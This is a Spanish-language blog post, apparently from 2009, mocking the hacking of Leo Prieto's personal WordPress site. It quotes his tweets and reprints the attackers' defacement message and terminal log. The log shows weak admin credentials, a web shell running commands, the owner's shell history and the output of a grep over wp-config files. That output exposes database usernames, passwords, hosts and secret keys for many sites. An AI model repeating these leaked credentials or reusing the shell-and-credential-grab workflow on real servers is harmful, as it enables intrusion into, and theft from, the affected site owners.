STOP SOPA : Explicación de la ley SOPA

Leo Prieto : Otra vez : Hackeado

EL Sabado 8 de Agosto de 2009 cuando Leo Prieto estaba celebrando un cumpleaños de Betazeta, tratando de olvidar los antiguos hackeos a Betazeta, justo hoy y como regalo por ser tan simpatico, y humilde, lo hackearon, aquí está lo que decia en su twitter:

  • Borraron todo los malnacidos, a buscar respaldos. Que se busquen una mujer y dediquen sus conocimientos a algo más productivo!
  • Gracias a todos por el apoyo, especialmente @franvarela por llamarme y a @tomaspollak por ayudarme a arreglar todo.
  • OBVIAMENTE mi usuario y contraseña NO es “adm”. Eso lo hacen para burlarse de mi. SI me hackearon, pero no se como.
  • Por la recontra cresta, weones malnacidos sin vida. ¿Que ganan con hackearme mi sitio personal? Ni está en los servidores de Betazeta!
  • [FW] ¡Feliz 12:34:56 7/8/9! ¡Feliz 1 año de Betazeta!: ¡Rápido! ¡En lo que dura este minuto aprovecha de hac.. http://bit.ly/IIo2G
    6:17 PM Aug 7th from twitterfeed
  • En el Betasado celebrando 1 año de @Betazeta – http://twitpic.com/d2jdq
    4:29 PM Aug 7th from Tweetie

Ah, se me olvidaba, Feliz Cumpleaños :)

En todo caso, este grupo debería hacer un video como en los viejos tiempos me acuerdo de este:

All Your Base Are Belong To Us

Imagen de previsualización de YouTube

También pueden ver cuando Hitler se entera del Hackeo a Betazeta
y la evidencia del hackeo:

====== t1nky_w1nky - d1psy - l44_l44 - p0 ========
======        special guest: b4rney       ========
#      ######  ####  #    # #    # ###### #####
#      #      #    # #    # ##   # #      #    #
#      #####  #    # #    # # #  # #####  #    #
#      #      #    # # ## # #  # # #      #    #
#      #      #    # ##  ## #   ## #      #    #
###### ######  ####  #    # #    # ###### #####
=========== 00000000000000000000000 =============

h4ppy macoy123456789 b1rthd4y!
dud3 y3st3rd4y w4s 12:34:56 7/8/9 w00000000t!

ch3ck this out:::
- http://www.holachc.com
- http://aavchile.cl
- http://www.begin.cl
- http://www.bootlog.cl/
- http://nicoykatiushka.org/works
- http://nicoykatiushka.org/blog02
- http://nicoykatiushka.org/beijing798
- http://www.luzymario.com
- http://leo.prie.to

[b4rney@m4chine]$ python l30-pr13t0.py --host leo.prie.to
====== 0day wp exploit ========
---------- l0adding .... -----------
> WP detected.
> login: /wp-login.php
> Checking ... Vulnerable!
[----------------------------------------] 100%
user: adm pass: adm
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --user adm --pass adm
..............................................
..............................................
..............................................
>> g0t sh3ll?
try http://leo.prie.to/anonysh3ll.php?command
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "id && whoami && uname -a"
uid=99(www-data) gid=100(mysql) groups=100(mysql)
www-data
Linux infong463 2.6.28.8-20090428g-filemon-idmap-grsec #1 SMP Tue Apr 28 17:25:03 CEST 2009 i686 GNU/Linux
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "ls -1a"
.
..
.bash_history
.lesshst
.mc
.mysql_history
.nano_history
.ssh
.subversion
.viminfo
access.log.42
access.log.42.6
ads
amanda
applewayer
betagol
betaid
camila
casa
cgi-bin
chc
check_info.php
ciervos
dbrestore
dominga
evidencia
favicon.ico
fotos
fwtv
grep
guna
hamsta
index-static.html
index.php
indicadores.html
iphone
leoabout
leonews
leoprieto
leoprojects
logs
luz
luzymario
maria
neta
niubie
nyk
oldhtdocs
portfolio
primo
psaux
rocktor
shit
spoon.css
spoon.html
spoon.js
spoon_home
spoon_home.swf
spoon_home2.swf
spoon_mac.css
spoon_win.css
sumo
temp
tools
videos
weveta
zetacorp
zimio
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "cat .bash_history"
find . -mtime -10
cd themes/
ls -al
cd .svn/
ls
ls -al
find .
cd format
ls -al
cd prop
cd tmp
ls -ala
cd ..
find .
exit
ls -al
cd rocktor/
ls -al
cd ..
ls -al
cd logs
ls -al
tail -100 access.log.current
date
grep "/panel" access.log.current
grep panel access.log.current
at access.log.current | grep panel
cat access.log.current | grep panel
ls -al
cat access.log.current
cd
cp logs/access.log.42.6.gz .
gzip -d access.log.42.6.gz
grep panel access.log.42.6
grep panel access.log.42.6 > evicencia
mv evicencia evidencia
ls -al
grep 212.24.147.228 access.log.42.6
grep "Mozilla/4.8 [en] (Windows NT 6.0; U)"  access.log.42.6
grep "Mozilla/4.8"  access.log.42.6
grep "Mozilla/4.8"  access.log.42.6  >  weveta
nano weveta
ls -al
cd ..
cd u37013311
ls
ls -al
cd .oneclick/
ls -al
cd ..
cd .config/
ls -al
cd .config/
cat lastmovespace
cd .tinc
ls -al
cd ..
ls -al
cd ..
ls -al
cd backup/
df -h
ls -al
cd oneclick/
ls -al
cd ..
cd rclient/
ls -al
cd ..
cd sclient/
ls -al
cd tmp
ls -al
cd ..
ls -al
cd mws
ls -al
cd
ls -al
pwd
cd logs
ls -al
cd rocktor/
ls -al
cd ..
ls -al
cd ..
ls -al
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057ext\063grep\055\060\056\071\056\060'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057ext\063grep\055\060\056\071\056\060'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057ext\063grep\055\060\056\071\056\060'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
quit
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs'`"
cd "`echo -e '\057homepages\057\062\064\057d\061\061\061\066\066\070\064\071\071\057htdocs\057rocktor'`"
exit
cd rocktor/
ls -al
cd wp-content/
ls -al
nano wp-cache-config.php
cd themes/
ls -al
cd .svn/
ls -L
ls -al
find .
grep *
grep * -R
ls -al
cd tmp/
ls -al
cd text-base/
ls -al
cd ..
svn log
cd ..
svn log --verbose
ls -al
cd .svn
ls -al
cd wcprops/
ls -al
cd ..
find .
cd wcprops/
ls -al
cd ..
cd entries
ls -al
cat entries
cat README.txt
ls -al
cd ..
ls -al
cd ..
ls -al
cd plugins/
ls -al
cd .svn/
ls -al
find .
cd ..
ls -al
cd ..
ls -al
cd .svn/
ls -al
cat entries
cd ..
ls -al
nano index.php
cd
ls -al
cd logs
ls -al
nano traffic.html
cd traffic.html
ls -al
cd ..
ls -al
cd ..
ls -al
cp logs/access.log.42.gz .
gzip -d access.log.42.gz
grep "Mozilla/4.8"  access.log.42 > grep
nano grep
history
nano grep
cat grep
grep -E "18/Oct/2008|bootlog" access.log.42
mount -t
df -h
mount
ls -al
wget http://ext3grep.googlecode.com/files/ext3grep-0.9.0.tar.gz
tar zxf ext3grep-0.9.0.tar.gz
cd ext3grep-0.9.0
ls -al
nano README
nano INSTALL
./configure
whereis fsck
lsof | grep bootlog
mc
ls -al
uname -r
cd ..
wget http://www.cgsecurity.org/testdisk-6.10.linux26.tar.bz2
tar jxf testdisk-6.10.linux26.tar.bz2
cd testdisk-6.10
ls -al
cd linux/
ls -a
ls -al
cd ..
cd rocktor/
../testdisk-6.10/linux/photorec_static
ls -al
cd logs
ls -al
cat ftp.log
ls -al
cd ..
ls -al
w
who
whoami
top
ps aux
cd /
ls -al
cd kunden
ls -al
cd ..
crontab -l
ls -al
cd homepages/
ls -al
cat /etc/debian_version
ls -al
cd
ls -al
cd rocktor/
ls -al
cd wp-content/cache/
ls -al
nano wp-cache-fc33ab04dfdb87fed9733ac825f6fd63.html
ls -al
cd ..
tar zcf bootlog-cache.tar.gz cache/
ls -al
tar zcf plugins.tar.gz plugins/
ls -al
cd themes/
ls -al
find .
lv
icat
ils
ls -al
ls -lai
cd ..
ls -al
ls -lair
ls -liar
ls -liaR
unrm
cd ..
wget http://www.porcupine.org/forensics/tct-1.18.tar.gz
tar zxf tct-1.18.tar.gz
cd tct-1.18
ls -al
make
ls -al
cd bin
ls -al
unrm --help
icat --help
lazarus --help
df ../../rocktor/
df -h
ls -al
df -h
unrm
df ~/rocktor
unrm /dev/sdb1 /tmp/unrm_output
dd if=/dev/sdb1 of=/tmp/dd_output.img
cd /tmp
ls -al
cd /var/lib/
ls -al
cd mysql
ls -al
cd mysql
ls -al
cd
ls -al
cd ..
ls -al
find .
grep --binary-files=text -A 20 -b 'INSERT INTO' /dev/sdb1 > /tmp/results
ls -al
cd rocktor/
ls -al
cd wp-content/
ls -al
cd plugins
ls -al
nano ultimos_comentarios.php
ls -al
nano sitemap.php
ls -al
cd ..
ls -al
cd ..
ls -al
cd ..
ls -al
cd rocktor/
ls -al
nano index.php
ls -al
nano evidencia
nano weveta
exit
ls -al
cd nyk/
ls -al
cd ..
ls -al
cd rocktor/
ls -al
cd ..
ls -al
cd mv boottemp.tar.gz rocktor/
mv boottemp.tar.gz rocktor/
ls -al
cd rocktor/
ls -al
tar zxf boottemp.tar.gz
ls -al
nano index.php
ls -al
rm index.php
mv index.html index.php
nano index.php
ls -al
cd ..
ls -al
cd ..
ls -al
cd ..
ls -al
cd ..
ls -al
cd tmp
ls -al
last
w
cd
ls -al
cd ..
ls -al
nano passwd
exit
ls -al
cd rocktor/
ls -al
nano index.php
ls -al
nano index.php
exit
ls -al
cd dbrestore/
ls -al
nano db156587268.dump
ls -al
nano .htaccess
ls -al
cd ..
ls -al
cd rocktor/
ls -al
cd wp-content/
ls -al
cd themes/
ls -al
find .
grep *
cat `find .`
cd ..
ls -al
cd ..
ls -al
mkdir tools
mv testdisk-6.10* tct* ext3grep-0.9.0* tools
ls -al
mkdir temp
mv index-static.html indicadores.html temp
ls -al
cd rocktor/
ls -al
exit
cd rocktor/
ls -al
cd ..
ls -al
cd iphone/
ls -al
cd icb/
ls -al
cd ..
ls -al
nano iphone/icb/leoprieto.css
ls -al
cd rocktor/
ls -al
nano .htaccess
mv .htaccess .htaccess.old
cp .htaccess.old .htaccess
nano .htaccess
exit
cd rocktor
nano .htaccess
ls -al
cd rocktor/
ls -al
cd ..
ls -al
cd temp/
ls -al
exit
ls -al
cd rocktor/
ls -al
nano index.php
exit
ls -al
cd oldhtdocs/
ls -al
cd htdocs/
ls -al
cd rock
ls -al
cd rock
cd rocktor/
ls -al
cd old/
ls -al
cd ..
ls -al
cd archives/
ls -al
nano 500.xml
cd ..
ls -al
cd up
ls -al
cd ..
ls -al
cd wp-content/
ls -al
cd plugins/
ls
cd ..
ls -al
cd themes/
ls -al
cd bootlog/
ls -al
nano TODO
cd ..
ls -al
tar zcf bootlog.tar.gz bootlog/
ls -al
cd ..
ls -al
cd ..
ls -al
tar zcf files.tar.gz up archives
cd oldhtdocs/
ls -al
cd htdocs/rocktor/
ls -al
cd wp-content/
ls -al
cd plugins/
ls -al
cd ..
ls -al
cd themes/
ls -al
cd bootlog
ls -al
nano meneame.php
exit
ls
ls -la
exit
top
exit
ls -la
exit
exit
ls -al
find . -name ".vim_history"
find . -name ".vimhistory"
ps aux
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "find . -name wp-config.php -exec grep -H ^define {} \;"
./chc/wp-config.php:define('DB_NAME', 'db245188179');    // The name of the database
./chc/wp-config.php:define('DB_USER', 'dbo245188179');     // Your MySQL username
./chc/wp-config.php:define('DB_PASSWORD', 'ahYtV3xD'); // ...and password
./chc/wp-config.php:define('DB_HOST', 'db55.perfora.net');    // 99% chance you won't need to change this value
./chc/wp-config.php:define('DB_CHARSET', 'utf8');
./chc/wp-config.php:define('DB_COLLATE', '');
./chc/wp-config.php:define('SECRET_KEY', 'how much wood would a woodchuck chuck if a woodchuck could chuck wood'); // Change this to a unique phrase.
./chc/wp-config.php:define ('WPLANG', '');
./chc/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/aav/wp-config.php:define('DB_NAME', 'db207246665');    // The name of the database
./oldhtdocs/htdocs/aav/wp-config.php:define('DB_USER', 'dbo207246665');     // Your MySQL username
./oldhtdocs/htdocs/aav/wp-config.php:define('DB_PASSWORD', 'ZfGtyaka'); // ...and password
./oldhtdocs/htdocs/aav/wp-config.php:define('DB_HOST', 'db978.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/aav/wp-config.php:define('DB_CHARSET', 'utf8');
./oldhtdocs/htdocs/aav/wp-config.php:define('DB_COLLATE', '');
./oldhtdocs/htdocs/aav/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/aav/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/begin/wp-config.php:define('DB_NAME', 'db217185939');    // The name of the database
./oldhtdocs/htdocs/begin/wp-config.php:define('DB_USER', 'dbo217185939');     // Your MySQL username
./oldhtdocs/htdocs/begin/wp-config.php:define('DB_PASSWORD', 'TJRATPFE'); // ...and password
./oldhtdocs/htdocs/begin/wp-config.php:define('DB_HOST', 'db1129.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/begin/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/begin/wp-config.php:define ('ENABLE_CACHE', true);
./oldhtdocs/htdocs/begin/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define('WP_CACHE', true); //Added by WP-Cache Manager
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define('DB_NAME', 'db176498184');    // The name of the database
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define('DB_USER', 'dbo176498184');     // Your MySQL username
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define('DB_PASSWORD', 'SUVXrQSx'); // ...and password
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define('DB_HOST', 'db519.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/begin-backup/begin-old/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define('WP_CACHE', true); //Added by WP-Cache Manager
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define('DB_NAME', 'db176498184');    // The name of the database
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define('DB_USER', 'dbo176498184');     // Your MySQL username
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define('DB_PASSWORD', 'SUVXrQSx'); // ...and password
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define('DB_HOST', 'db519.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/begin-backup/begin3/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define('WP_CACHE', true); //Added by WP-Cache Manager
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define('DB_NAME', 'db176498184');    // The name of the database
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define('DB_USER', 'dbo176498184');     // Your MySQL username
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define('DB_PASSWORD', 'SUVXrQSx'); // ...and password
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define('DB_HOST', 'db519.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/begin-backup/believe.chao/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define('WP_CACHE', true); //Added by WP-Cache Manager
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define('DB_NAME', 'db176498184');    // The name of the database
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define('DB_USER', 'dbo176498184');     // Your MySQL username
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define('DB_PASSWORD', 'SUVXrQSx'); // ...and password
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define('DB_HOST', 'db519.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/begin-backup/believe.old/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/believe/wp-config.php:define('DB_NAME', 'db217185939');    // The name of the database
./oldhtdocs/htdocs/believe/wp-config.php:define('DB_USER', 'dbo217185939');     // Your MySQL username
./oldhtdocs/htdocs/believe/wp-config.php:define('DB_PASSWORD', 'TJRATPFE'); // ...and password
./oldhtdocs/htdocs/believe/wp-config.php:define('DB_HOST', 'db1129.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/believe/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/believe/wp-config.php:define ('ENABLE_CACHE', true);
./oldhtdocs/htdocs/believe/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/believe.old/wp-config.php:define('DB_NAME', 'db217185939');    // The name of the database
./oldhtdocs/htdocs/believe.old/wp-config.php:define('DB_USER', 'dbo217185939');     // Your MySQL username
./oldhtdocs/htdocs/believe.old/wp-config.php:define('DB_PASSWORD', 'TJRATPFE'); // ...and password
./oldhtdocs/htdocs/believe.old/wp-config.php:define('DB_HOST', 'db1129.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/believe.old/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/believe.old/wp-config.php:define ('ENABLE_CACHE', true);
./oldhtdocs/htdocs/believe.old/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define('WP_CACHE', true); //Added by WP-Cache Manager
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define('DB_NAME', 'db156587268');    // The name of the database
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define('DB_USER', 'dbo156587268');     // Your MySQL username
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define('DB_PASSWORD', '6PsVKzve'); // ...and password
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define('DB_HOST', 'db316.perfora.net');    // 99% chance you won't need to change this value
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/rocktor/old/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_USER', 'dbo196559571');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_PASSWORD', 'ACHXMZwF');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_HOST', 'db567.perfora.net');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_NAME', 'db156587268');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_USER', 'dbo156587268');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_PASSWORD', '6PsVKzve');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('DB_HOST', 'db316.perfora.net');
./oldhtdocs/htdocs/rocktor/wp-config.php:define ('WPLANG', '');
./oldhtdocs/htdocs/rocktor/wp-config.php:define('WP_CACHE', true);
./oldhtdocs/htdocs/rocktor/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./nyk/works/wp-config.php:define('DB_NAME', 'db279672073');
./nyk/works/wp-config.php:define('DB_USER', 'dbo279672073');
./nyk/works/wp-config.php:define('DB_PASSWORD', 'RxVJpy8v');
./nyk/works/wp-config.php:define('DB_HOST', 'db776.perfora.net');
./nyk/works/wp-config.php:define('DB_CHARSET', 'utf8');
./nyk/works/wp-config.php:define('DB_COLLATE', '');
./nyk/works/wp-config.php:define('AUTH_KEY', 'put your unique phrase here');
./nyk/works/wp-config.php:define('SECURE_AUTH_KEY', 'put your unique phrase here');
./nyk/works/wp-config.php:define('LOGGED_IN_KEY', 'put your unique phrase here');
./nyk/works/wp-config.php:define('NONCE_KEY', 'put your unique phrase here');
./nyk/works/wp-config.php:define ('WPLANG', '');
./nyk/blog02/wp-config.php:define('DB_NAME', 'db279672638');
./nyk/blog02/wp-config.php:define('DB_USER', 'dbo279672638');
./nyk/blog02/wp-config.php:define('DB_PASSWORD', 'GV38aePB');
./nyk/blog02/wp-config.php:define('DB_HOST', 'db774.perfora.net');
./nyk/blog02/wp-config.php:define('DB_CHARSET', 'utf8');
./nyk/blog02/wp-config.php:define('DB_COLLATE', '');
./nyk/blog02/wp-config.php:define('AUTH_KEY', 'put your unique phrase here');
./nyk/blog02/wp-config.php:define('SECURE_AUTH_KEY', 'put your unique phrase here');
./nyk/blog02/wp-config.php:define('LOGGED_IN_KEY', 'put your unique phrase here');
./nyk/blog02/wp-config.php:define('NONCE_KEY', 'put your unique phrase here');
./nyk/blog02/wp-config.php:define ('WPLANG', '');
./nyk/beijing798/wp-config.php:define('DB_NAME', 'db279672291');
./nyk/beijing798/wp-config.php:define('DB_USER', 'dbo279672291');
./nyk/beijing798/wp-config.php:define('DB_PASSWORD', 'MrJJXkjD');
./nyk/beijing798/wp-config.php:define('DB_HOST', 'db779.perfora.net');
./nyk/beijing798/wp-config.php:define('DB_CHARSET', 'utf8');
./nyk/beijing798/wp-config.php:define('DB_COLLATE', '');
./nyk/beijing798/wp-config.php:define('AUTH_KEY', 'put your unique phrase here');
./nyk/beijing798/wp-config.php:define('SECURE_AUTH_KEY', 'put your unique phrase here');
./nyk/beijing798/wp-config.php:define('LOGGED_IN_KEY', 'put your unique phrase here');
./nyk/beijing798/wp-config.php:define('NONCE_KEY', 'put your unique phrase here');
./nyk/beijing798/wp-config.php:define ('WPLANG', '');
./luzymario/wp-config.php:define('DB_NAME', 'db246332041');    // The name of the database
./luzymario/wp-config.php:define('DB_USER', 'dbo246332041');     // Your MySQL username
./luzymario/wp-config.php:define('DB_PASSWORD', 'xe8y3mXy'); // ...and password
./luzymario/wp-config.php:define('DB_HOST', 'db72.perfora.net');    // 99% chance you won't need to change this value
./luzymario/wp-config.php:define('DB_CHARSET', 'utf8');
./luzymario/wp-config.php:define('DB_COLLATE', '');
./luzymario/wp-config.php:define('SECRET_KEY', 'luz y mario around the world honeymoon tour 2008'); // Change this to a unique phrase.
./luzymario/wp-config.php:define ('WPLANG', '');
./luzymario/wp-config.php:define('ABSPATH', dirname(__FILE__).'/');
./leoprieto/wp-config.php:define('DB_NAME', 'db279987425');
./leoprieto/wp-config.php:define('DB_USER', 'dbo279987425');
./leoprieto/wp-config.php:define('DB_PASSWORD', 'UX2AgXgB');
./leoprieto/wp-config.php:define('DB_HOST', 'db792.perfora.net:3306');
./leoprieto/wp-config.php:define('DB_CHARSET', 'utf8');
./leoprieto/wp-config.php:define('DB_COLLATE', '');
./leoprieto/wp-config.php:define('AUTH_KEY', 'how much wood would a woodchuck chuck if a woodchuck could chuck wood');
./leoprieto/wp-config.php:define('SECURE_AUTH_KEY', 'susana sana su sabana');
./leoprieto/wp-config.php:define('LOGGED_IN_KEY', 'she sells sea shells on the sea shore');
./leoprieto/wp-config.php:define('NONCE_KEY', 'tres tristes tigres trigo tragaron en un trigal');
./leoprieto/wp-config.php:define ('WPLANG', '');
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "cat evidencia"
190.20.17.168 - - [18/Oct/2008:01:07:42 -0400] "GET /archives/2005/11/barrita_mac_ubuntu.html HTTP/1.1" 200 52832 www.bootlog.cl "http://www.google.cl/search?hl=es&q=ubuntu%2Bdejar+panel+de+abajo+arriba&btnG=Buscar&meta=" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"
89.136.154.118 - - [18/Oct/2008:03:16:49 -0400] "GET /archives/2005/11/ubuntu.jpg HTTP/1.1" 200 127167 www.bootlog.cl "http://images.google.ro/imgres?imgurl=http://www.bootlog.cl/archives/2005/11/ubuntu.jpg&imgrefurl=http://www.linuxforums.org/forum/linux-desktop-x-windows/110216-nice-panel-i-am-picky.html&h=1050&w=1400&sz=131&tbnid=sjaJDpk9SYDqhM:&tbnh=113&tbnw=150&hl=ro&um=1&prev=/images%3Fq%3DWHY%2BUBUNTU%26um%3D1%26hl%3Dro%26sa%3DN&frame=small" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "-"
190.182.21.70 - - [18/Oct/2008:04:10:08 -0400] "GET /up/2006/08/ubuntu_system_panel.jpg HTTP/1.1" 200 20349 www.bootlog.cl "http://www.bootlog.cl/blog/tips/instalando-el-menu-de-suse-en-ubuntu/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"
193.174.33.200 - - [18/Oct/2008:04:27:17 -0400] "GET /panel/wp-admin.css?version=2.2-bleeding HTTP/1.1" 200 19173 www.bootlog.cl "http://bootlog.cl/wp-login.php" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:27:32 -0400] "GET /panel/images/login-bkg-bottom.gif HTTP/1.1" 200 704 www.bootlog.cl "http://www.bootlog.cl/panel/wp-admin.css?version=2.2-bleeding" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:27:32 -0400] "GET /panel/images/fade-butt.png HTTP/1.1" 200 785 www.bootlog.cl "http://www.bootlog.cl/panel/wp-admin.css?version=2.2-bleeding" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:27:32 -0400] "GET /panel/images/login-bkg-tile.gif HTTP/1.1" 200 19279 www.bootlog.cl "http://www.bootlog.cl/panel/wp-admin.css?version=2.2-bleeding" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:28:32 -0400] "GET /panel/ HTTP/1.1" 200 6484 bootlog.cl "http://bootlog.cl/wp-login.php" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:28:47 -0400] "GET /wp-includes/js/fat.js?ver=1.0-RC1_3660 HTTP/1.1" 200 2566 www.bootlog.cl "http://bootlog.cl/panel/" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:28:51 -0400] "GET /wp-includes/js/prototype.js?ver=1.5.0-0 HTTP/1.1" 200 71260 www.bootlog.cl "http://bootlog.cl/panel/" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:29:16 -0400] "GET /panel/images/wordpress-logo.png HTTP/1.1" 200 2345 bootlog.cl "http://bootlog.cl/panel/" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
193.174.33.200 - - [18/Oct/2008:04:29:20 -0400] "POST /panel/index-extra.php?jax=incominglinks HTTP/1.1" 200 1065 bootlog.cl "http://bootlog.cl/panel/" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
212.24.147.228 - - [18/Oct/2008:04:37:32 -0400] "GET /panel/edit.php HTTP/1.1" 200 4620 bootlog.cl "http://bootlog.cl/panel/" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
212.24.147.228 - - [18/Oct/2008:04:37:46 -0400] "GET /wp-includes/js/wp-ajax-js.php?ver=20070118 HTTP/1.1" 200 3522 www.bootlog.cl "http://bootlog.cl/panel/edit.php" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
212.24.147.228 - - [18/Oct/2008:04:37:48 -0400] "GET /wp-includes/js/list-manipulation-js.php?ver=20070118 HTTP/1.1" 200 9119 www.bootlog.cl "http://bootlog.cl/panel/edit.php" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
210.22.83.146 - - [18/Oct/2008:04:45:06 -0400] "GET /panel/users.php HTTP/1.1" 200 7134 bootlog.cl "http://bootlog.cl/panel/edit.php" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
210.22.83.146 - - [18/Oct/2008:04:45:18 -0400] "GET /panel/users.js?ver=4583 HTTP/1.1" 200 845 www.bootlog.cl "http://bootlog.cl/panel/users.php" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
